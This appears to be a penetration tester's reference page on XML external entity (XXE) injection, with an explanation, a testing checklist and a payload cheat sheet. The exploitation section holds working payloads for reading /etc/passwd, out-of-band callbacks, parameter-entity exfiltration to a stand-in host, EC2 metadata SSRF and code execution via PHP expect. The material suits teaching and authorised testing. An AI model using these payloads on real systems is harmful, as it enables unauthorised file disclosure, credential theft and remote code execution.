XXE (XML external entity) injection

What is it?

XML External Entity (XXE) vulnerabilities occur when an application processes XML input that includes a reference to an external entity. This vulnerability can occur in any technology that parses XML. By exploiting an XXE vulnerability, an attacker can read local files on the server, interact with internal systems, or conduct denial of service attacks.

A simple example

A vulnerable application might parse XML input from a user without disabling external entities. An attacker could then send XML like the following:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>

In this case, the XML parser will replace &xxe; with the contents of the /etc/passwd file and include it in the output.

XXE can often lead to:

• Disclosure of internal files

• Server Side Request Forgery (SSRF)

• Denial of Service

• Remote Code Execution in some rare cases

Other learning resources:

• PortSwigger: https://portswigger.net/web-security/xxe

• OWASP: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

Writeups:

Checklist

Objective

• Identify endpoints that can process XML

• Create a working XML payload that can be adapted to deliver exploits

• Test identified endpoints for XXE

Attack surface discovery

• Identify endpoints that accept XML payloads

  • Review requests in proxy for XML data

  • Identify endpoints that accept JSON by sending XML

  • Identify endpoints that accept images by sending SVG images

  • Identify endpoints that accept documents by sending DOCX or PDF files

• Test with the header Content-Type: application/xml

• Verify working XML payloads that can be adapted to deliver exploits

• Locate internal DTDs

Testing

• Test for external entities with a simple non-malicious payload

• Test for external entities with an available file (e.g. for Linux /etc/passwd)

• Test for external entities with an available endpoint you control (e.g. collaborator or webhook.site)

• Test for external entities with other available endpoints

  • EC2 metadata endpoint http://169.254.169.254/latest/meta-data

• Test filters and restrictions

  • Trigger error messages to exfiltrate information

• Test for denial of service

• Test for code execution

Impact

• Can we read sensitive files?

  • Configuration files

  • System files

  • SQLite files

  • SSH keys

• Can we exfiltrate sensitive information?

• Can we achieve code execution?

Exploitation

Sources

• My pentest notes

• PortSwigger

• PayloadsAllTheThings

Detect XXE

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe "test"> ]>
<foo>
  <bar>&xxe;</bar>
</foo>

Include files Note: You might need "file:///etc/passwd"

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
<foo>
  <bar>&xxe;</bar>
</foo>

List files: Note: Restricted to Java applications

<!--?xml version="1.0" ?-->
<!DOCTYPE aa[<!ELEMENT bb ANY>
<!ENTITY xxe SYSTEM "file:///">]>
<foo>
  <bar>&xxe;</bar>
</foo>

Out-of-band:

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator"> ]>
<foo>
  <bar>&xxe;</bar>
</foo>

Parameter entities:

<!DOCTYPE ase [ <!ENTITY % xxe SYSTEM "http://collaborator"> %xxe; ]>

Load an external DTD:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://our-site.com/?x=%file;'>">
%eval;
%exfiltrate;

Execute code Note: Only works in the PHP 'expect' module is available

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<foo>
    <bar>&xxe;</bar>
</foo>

Include XML as a parameter value

param=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Other sources

• Fuzzing for XXE https://github.com/xmendez/wfuzz/blob/master/wordlist/Injections/XML.txt

• Fuzzing for local DTDs https://github.com/GoSecure/dtd-finder/tree/master/list